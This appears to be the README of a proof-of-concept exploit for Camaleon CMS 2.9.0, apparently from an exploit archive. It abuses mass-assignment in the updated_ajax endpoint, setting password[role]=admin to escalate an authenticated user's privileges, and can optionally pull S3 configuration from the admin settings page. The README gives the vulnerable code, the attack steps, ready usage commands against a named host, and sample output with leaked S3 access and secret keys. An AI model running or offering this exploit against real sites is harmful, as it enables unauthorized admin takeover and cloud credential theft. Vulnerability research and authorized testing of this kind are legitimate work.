Share
## https://sploitus.com/exploit?id=4405BB05-5F85-5603-9FA8-63FCEA2E14BD
# Camaleon CMS 2.9.0 – Authenticated Privilege Escalation (Role Change) + Optional S3 Config Leak

> **Target:** Camaleon CMS `v2.9.0`  
> **Type:** Authenticated privilege escalation via mass-assignment in `updated_ajax` (role field)  
> **Extras:** Optional extraction of S3 configuration from the admin settings page (if the authenticated user can access it after escalation)

## Overview

This repository contains a Python proof-of-concept script that:

1. Logs into the Camaleon CMS admin panel with valid credentials.
2. Fetches a CSRF token from `/admin/profile/edit`.
3. Calls the `updated_ajax` endpoint to update `password[...]` fields **and** abuse `permit!` to set `password[role]=admin`.
4. Optionally (`-e`) extracts S3 configuration values from `/admin/settings/site`.
5. Optionally (`-r`) reverts the role back to its original value after the run.

This behavior matches the insecure mass-assignment pattern described in the related advisory:
- Tenable Research Advisory: TRA-2025-09

## Root Cause (What’s vulnerable)

The controller action below updates a user with `permit!`:

```ruby
def updated_ajax
  @user = current_site.users.find(params[:user_id])
  update_session = current_user_is?(@user)

  @user.update(params.require(:password).permit!)
  render inline: @user.errors.full_messages.join(', ')

  # keep user logged in when changing their own password
  update_auth_token_in_cookie @user.auth_token if update_session && @user.saved_change_to_password_digest?
end
```

Because `permit!` allows **all** keys under `password`, an attacker can send:

- `password[password]`
- `password[password_confirmation]`
- **`password[role]=admin`**  

and the application will accept it, upgrading the user’s role.

## Impact

- Any authenticated user who can reach the vulnerable route can potentially escalate privileges by setting their role to `admin`.
- After escalation, admin-only pages (like site settings) may become accessible, potentially leaking sensitive configuration values (e.g., S3 keys).

## Requirements

- Python 3.8+
- `requests`

Install dependency:

```bash
pip install requests
```

## Usage

### Basic privilege escalation (authenticated)

```bash
python exploit.py -u http://alienone.in -U test -P test
```

### Escalate + extract S3 config (`-e`)

```bash
python exploit.py -u http://alienone.in -U test -P test -e
```

### Escalate + revert role back (`-r`)

```bash
python exploit.py -u http://alienone.in -U test -P test -r
```

### Escalate + extract + revert

```bash
python exploit.py -u http://alienone.in -U test -P test -e -r
```

### Arguments

| Flag | Description |
|------|-------------|
| `-u, --url` | Base URL (e.g., `http://alienone.in`) |
| `-U, --username` | Valid username |
| `-P, --password` | Valid password |
| `--newpass` | Password value sent in the update request (default: `test`) |
| `-e, --extract` | Extract S3 config from settings page |
| `-r, --revert` | Revert role back to the original role after escalation |

## Sample Execution

```bash
python3 exploit.py -u http://alienone.in -U test -P test -e -r
```

### Sample Output

```
[+]Camaleon CMS Version 2.9.0 PRIVILEGE ESCALATION (Authenticated)
[+]Login confirmed
   User ID: 5
   Current User Role: client
[+]Loading PPRIVILEGE ESCALATION
   User ID: 5
   Updated User Role: admin
[+]Extracting S3 Credentials
   s3 access key: AKIAF3A388ECF117D966
   s3 secret key: VRRVL5fePgqtow/1Xw65TL9iA2DXtj258BkH33Ux
   s3 endpoint: http://localhost:54321
[+]Reverting User Role
   User ID: 5
   User Role: client
```

---

## How the PoC Confirms Login

The script checks the returned HTML for an `/admin/logout` link after the login POST.  
If the logout link is present, the session is considered authenticated.

## Notes on CSRF Tokens

Camaleon uses Rails-style CSRF. You’ll typically see tokens in two common places:

- Hidden input in forms: `name="authenticity_token" value="..."`
- Meta tag: ``

The PoC fetches the **meta csrf-token** from `/admin/profile/edit` and uses it in:

- Request body: `authenticity_token=`
- Header: `X-CSRF-Token: `

## Disclaimer

This code is provided **for authorized security testing and educational purposes only** (e.g., labs, CTFs, and environments where you have explicit permission).  
Do not use it against systems you do not own or have permission to test.


---

## References

- Tenable Advisory: TRA-2025-09  
  https://www.tenable.com/security/research/tra-2025-09

---